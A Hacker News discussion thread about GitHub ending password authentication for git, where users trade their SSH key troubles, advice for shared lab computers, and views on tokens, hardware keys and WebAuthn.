Signed: a developer with well over a decade of experience in version control, *nix, Windows, crypto, etc.


I'd be really interested in hearing about your struggles - this tells me there's something really wrong with the tutorials you were reading (through no fault of your own).


It was a month ago and I didn't note down all my attempts. It went something like:

Pushes were not working. I re-entered my password a few times, checked other config settings a few times before Googling the Git error message, which led me to find that GitHub's security policy was changing.

I tried an SSH login (fail), switched to trying locally generated SSH keys.

Used PuTTY's "puttygen.exe" to make an SSH key. Did that, then found it was a newer format that Tortoise could not handle. Used TortoiseGit's copy of "puttygen.exe". Did this a few times as GitHub wouldn't accept the format that my key was in.

Gave up on GUI key generation, tried command-line and failed a few more times.

I think I looked at personal access tokens at some point.

Went back to GUI SSH file creation, and managed to upload my puttygen SSH key by copy/pasting from part of the dialog box that I hadn't tried before.

Used GitHub's "git@github.com:<username>/repo" syntax to get a fresh clone of my repo. Finally I realised that I needed to use the github URL syntax combined with "Load Putty Key" ticked and pointing to my private key

I'm still not sure if it's the right way or the best way, but it worked, so I stopped looking.


I don't think I can recommend anyone use PuTTY on Windows anymore, partly because of issues like this. It might be that TortoiseGit is old, but ssh.exe should be available on Windows 10 now.


I still find PuTTY very useful, but domain spammers have managed to hijack the author's official page from the top of search-engine lists.


What's the recommended way to manage git clones on shared computers now?

In the past, multiple people would use these computers, and would push and pull using their own github credentials. I'm talking lab computers in a research context, where there is a shared login to the computer, but where we use our own github credentials to access a shared repo we all have commit rights to.

Now what are we supposed to do? I don't want to put my ssh key, or an access token or whatever, on a shared computer. My colleagues using that computer should not be able to access my other github repos. I should be entering a password, something I can keep in my head.


Honestly, in the case of a shared computer, I wouldn't recommend even using a password.

A lot of employers put monitoring software on their computers, and have keyloggers that can record your passwords. It's probably illegal for them to use the passwords, but I have heard horror stories where employers secretly log into their worker's social media accounts.

I'd recommending buying a U2F or FIDO2 security key, and creating a ed25519-sk or ecdsa-sk SSH key, see: https://github.blog/2021-05-10-security-keys-supported-ssh-g...

Basically, the SSH key is stored on the hardware key, and for every single git pull/git push you need to do, you must have the security key plugged in. If you're worried about forgetting the key and leaving it plugged in, you could add a password to the SSH key as well, so you're doubly protected.


You can wrap an ssh key with a password.


You can use an access token (and not store it), or you can use one unique ssh key per machine.

But yeah, it looks like for your use case this is not a great change.


Not necessarily recommended, but something that was done by a real team at a real company.

We all had our own GitHub Enterprise accounts. But only one was logged on to each computer. Rather than switch out the accounts when someone else used a computer, we just included the initials of whoever was making the commit in the message. E.g. DU: Fix some bug, if Double Unplussed was making the commit.

This only really worked because no one was using a GitHub login that they also used for personal projects - only the corporate ones were connected. And it made the GitHub statistics on who was contributing what completely useless. But it did mean that we could rotate among the shared computers and push easily, and if you did need to ask someone for help when investigating a bug, you could still see who made the changes via git blame - just by looking at the message instead of who Git thought had pushed it.

Might not work for your use case, and I'm sure some readers will be horrified, but it worked well enough for us, in an XKCD 1172 (https://xkcd.com/1172/) style manner.


That's an orthogonal issue, we already use a pre-commit hook that prompts for the committers name instead of caching it. Who commits is one thing, who authenticates a push is another.

I guess we could have a shared github account and I could give it commit rights to the specific repositories. But that's still pretty silly that I should have to do that.


In general shared computers should have seperate users, on Linux your user is just an su - away.


In this case the environment is shared and so there is a single user account - this is for example a computer in a laboratory, connected to instruments.

Multiple user accounts would defeat the purpose of it being a shared computer. It's a shared computer because everyone is using it for the same thing.


You can have a folder that's g+rwx and just give everyone different accounts for things like git. That's the reason these things exist.


Very sad. An unfriendly move needlessly forcing unnecessary complexity. People should be able to decide this for themselves.


That's not how security works. Give users the easy option, and they'll take it. For things to be secure by default, you need to disallow or _heavily_ discourage all potentially insecure options.


Blindly assuming that everybody has the same threat model is also not how security works.


Hot tip for IntelliJ users: add your github account to the IDE (in project settings) and the IDE will use an OAuth token for git access on that account.

(I think the way it's structured is that Jetbrains is the OAuth provider, and Github is the relying party, which implies that you need to make sure your Jetbrains account is secure. It also means that if you want the best security you'll stick with the tried-and-true private-key-in-.ssh-public-key-on-remote solution)


Seems odd Github would announce the cutoff time in PST when the USA is in PDT.


This is a very common mistake. Lots of people are unaware that they're supposed to change acronyms depending on whether or not daylight savings time is in effect.


PST means Pacific Summer Time in the summer.


This should reflect in the title that it is about GitHub, not about git.


It's pretty obvious. Git itself doesn't have password authentication (I mean locally/repo-level, only on the transport level) and it can't be "shut down", only "removed" or "unsupported"/"deprecated".

Also, you can see the domain right next to the submission title.


For any Githubbers reading, my coworker was apparently affected by a brownout window and changed to using a personal access token. He didn't know it at the time but I just mentioned the period and it lines up with when had issues with his authentication. Seems like a success if you ask me!


I have a noob question: what's the right way to use these tokens without password managers? I believe Github recommended assigning it as an environment variable in docs related to this deprecation, but isn't a (managed) server free to log the output of `echo $token`?


Use SSH and GPG to authenticate and sign commits, it's easier and quicker. If you're doing something that needs a token use a GitHub App Token:

https://docs.github.com/en/developers/apps/getting-started-w...


If there's a managed server you don't trust, it's unsafe to put anything that authenticates you to GitHub there, because it can (e.g.) modify the git command to push malicious code.

For a semi-trusted machine (e.g., you want to "git push" to work-related OSS from your work desktop, but you don't want your work HR/IT departments to have full access to your GitHub account if they decide they want it), make a new SSH key and configure it as a read/write deploy key for that one repo. This workflow is primarily intended for automation, but it's reasonable for this sort of interactive use as well.

https://docs.github.com/en/developers/overview/managing-depl...


One probably has to assume at least some level of control of any system where there's access to secrets where they're necessary for production processes.

But if you aren't confident of it, then at least that token only has access to a repository, and can't be exfiltrated to let somebody log in and really mess with your user account or your organization.

(All that said: I'd recommend a single-use, minimally privileged SSH key over an access token, just because that workflow's what you should be using on a desktop too.)


You can use a git credential manager that supports GitHub login flows. GCM Core is the big one: https://github.com/microsoft/Git-Credential-Manager-Core

(It lets you login to GitHub in a popup browser window and then manages the access token for you. Stores the access token in a machine credential cache for subsequent calls on that machine.)


Oh great. More security theater.

This should be a per repository setting. Not system wide! If someone has a "threat model" where "passwords are bad" then fine. Force users interacting with that particular repository to deal with this security theater of making tokens which have the same power as the account that authorized them. I guess they have better granularity, but in practice anything more complicated that Unix permissions is a total disaster and just leads to people not understanding what the different levels actually mean.

It shouldn't be imposed top-down on every user.


they just don't want to maintain that code path anymore for whatever reason. its their product, their choice. you're just along for the ride.


I've used this for years on an account I only occasionally commit something once or twice a year, from different computers (but still too complicated to use the online editor).

It's easy to forget that not every use case is a regular developer who has their dev environment set up. That said, for me it wasn't a big deal just switching to ssh keys like with my main account.


While it is a clear win for security, git password auth is still part of the regular api that git provide. I get that github is big enough to set their own standard, but oftentime, when other big companies did that (Microsoft, Google, etc.) it ended up being detrimental to the global ecosystem. Of course it doesn't have to be here...


Anyone else notice that GitHub recently removed the sample code for cloning with SSH?


I deleted my github account when M$ took over so I can't check. You're logged, you have declared a SSH key but they still don't provide the small code line to clone using SSH?


That's a good question. It seems to only happen if I'm not logged in. It could very well be because it doesn't know if I have an SSH key. Not that it really matters for a public repo.


Yep. I feel it's been a few weeks at least.


This is a good thing, but I've got an awkward "chicken and egg" situation. My dotfiles are stored on GitHub, which I pull using username/password. The scripts then sets up and adds a new SSH key to GitHub.


You can still use a PAT (personal access token) to authenticate via HTTPS. Instead of sending username and password, you send username and the PAT token for authentication


They are temping fate by releasing this on Friday 13th :)


I'm using git-bash on windows, I've created my key pair and set it up on my github account.

What is the correct way to automatically use when pull/pushing?


it seems about the only use case for passwords was cloning a private repository in an environment where you don't want keep your keys. that said, any environment where you don't want to keep your keys isn't necessarily a place you want to be typing in your account password anyhow.

human typable one time passwords for this purpose could be cool. although it's a pretty rare use case.


I don't know how disruptive this will be, but there are many much better options to authenticate against github besides a password.


Are there any use-cases where this would have been preferable to plain key-based ssh auth?


https://www.sparkleshare.org/ reminder for non-coding usages of git. Though of course this does't solve the user/passwd going away problem itself


For some reason I cant figure out the token auth on Netbeans


github auth is literally so broken that it claims chrome cant even support fido security keys, and they think SMS is a secure alternate path.


If password authentication is insecure, why don't most website authenticate with private key?

Because most people want to keep it simple.


You can use git with github with password authentication?


nice


I really couldn't give less of a fuck if my smattering of half-finished learning projects were lacking """best practices""" in security. So sick of this stupid nerd bullshit sometimes.


Embrace. Extend. Extinguish


Passwords are probably one of the worst things to happen to our field as a whole (phishing, password managers, etc. are the results of their ubiquity), so efforts to remove them are probably not part of some Microsoft plan to kill open source. This change is a good thing.


Indeed. I wish there was something like a token or key that was as ubiquitous as passwords.

Though from a developer POV I can certainly see why passwords are so attractive: take a word, hash it, compare hash on subsequent logins.

The alternatives are tricky, but not I suspect impossible, to do in a decentralised manner. I've often pondered that something like PGP servers with revocation certificates, but adapted to logins would be near the realm of a solution.


Our best hope is WebAuthn.

For the user this is extremely simple. For the programmers it's a bunch of new stuff to learn (or a new library to pull in) when implementing it, including things like you're going to want a whole new RDBMS table not just a wider "password" in the database - but for the user it's very simple and impossible to get wrong.

I implemented it by hand for my vanity site, it was not a tremendous amount of work. GitHub - since they are the topic after all - offers it today. But beyond big hitters (e.g. Gmail, Facebook) I am disappointed by how few have bothered.

It's a night and day difference in terms of security and in terms of ease of use but it seems most places aren't interested in doing more than the very bare minimum.


Do you want to be the one to explain PGP and revcerts to somebody who has used the same password for everything their whole life?


That's why I said 'something like'. An extension of the idea adapted for wider use.

I'm certain such a person uses TCP/IP every day and doesn't need it explained. Yet twenty years ago, some knowledge of IP addresses and subnet masks etc was necessary to get connected.


Yeah, I think WebAuthn is fairly seamless. Ordinary users do not have to worry about certificates or anything. They just log in with their face, fingerprint, or a computer-local PIN.

I think what prevents wider adoption of WebAuthn is the fear that users are going to lose their phone and not have a backup authenticator. But, people probably lose their phone less often than they forget passwords, so I doubt it changes the support burden much.


Not everything needs perfect OpSec. sometimes convenience is more important. I don't care if my HN account gets hacked and if I was forced to use 2FA I would just stop using it.

Passwords have security vulnerabilities, sure. But they're intuitive and usable. When you start trying to come up with alternatives there become dozens of edge-cases in which your system fails.


Passwords are exceedingly inconvenient, and getting rid of them doesn't require adding a second factor. To use passwords, you have to constantly monitor the Internet to see if it's been leaked (in the case where you use a password and memorize it), or you have to subscribe to a third-party service to manage your passwords. To use WebAuthn, you just need the functionality built into your OS. Physical custody of your computer and the screen lock then protect your online accounts.

Or in the case of Github, you generate an SSH key and put the public key in Github and keep the private key around.

Both are much more convenient than passwords, but also more secure. It's a win/win.


This is stupid, they only had to request passwords longer than 15 characters and that would have an even better effect. As web access will be also safer.

They do it to prevent password reuse, but still allow passwords on the web. I don't get it


They do it to prevent passwords, which allow access to privileged things like account settings, from being stored (and thus subject to being accidentally leaked).

It doesn't matter how long your password is if your password is in a text file with bad chmod permissions to people who shouldn't have it.

An access token, at least, limits the blast radius.


I doubt this "saved passwords" is the issue, but people choosing guessable passwords. Especially with the bit-coin attacks on the Github CI sandboxes, thee attackers don't care about the repo that much but they want access to the X% of github accounts that use a top 100 or top 1000 password, so they can get in and start mining.


Ah get it. They don't want the password to login on github to be the same as the one you store on a text file. Makes sense. But it is still Baby-sitting


What you describe as "baby-sitting", I would call "encouraging users to fall into the pit of success."

Many, many GitHub users are not professional software developers, and many more than that are not security-minded users at all. Small incremental improvements like this are a kind of defense in depth, and it is valuable.


And we have fifty years of software development history to prove we need this kind of babysitting. It’s a pain one time and then you realize it wasn’t hard to do and start doing a better practice out of habit.


Eh, I think everyone stands to benefit when a service increases their security standards in a reasonable way. Fewer account recovery support requests for them, fewer footguns for inexperienced users of theirs.

Do you consider password length requirements baby-sitting?


If this is babysitting, I never want to grow up.


You have a much more flexible interface with the user on the web than via git push.




Consider applying for YC's Spring batch! Applications are open till Feb 11.

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: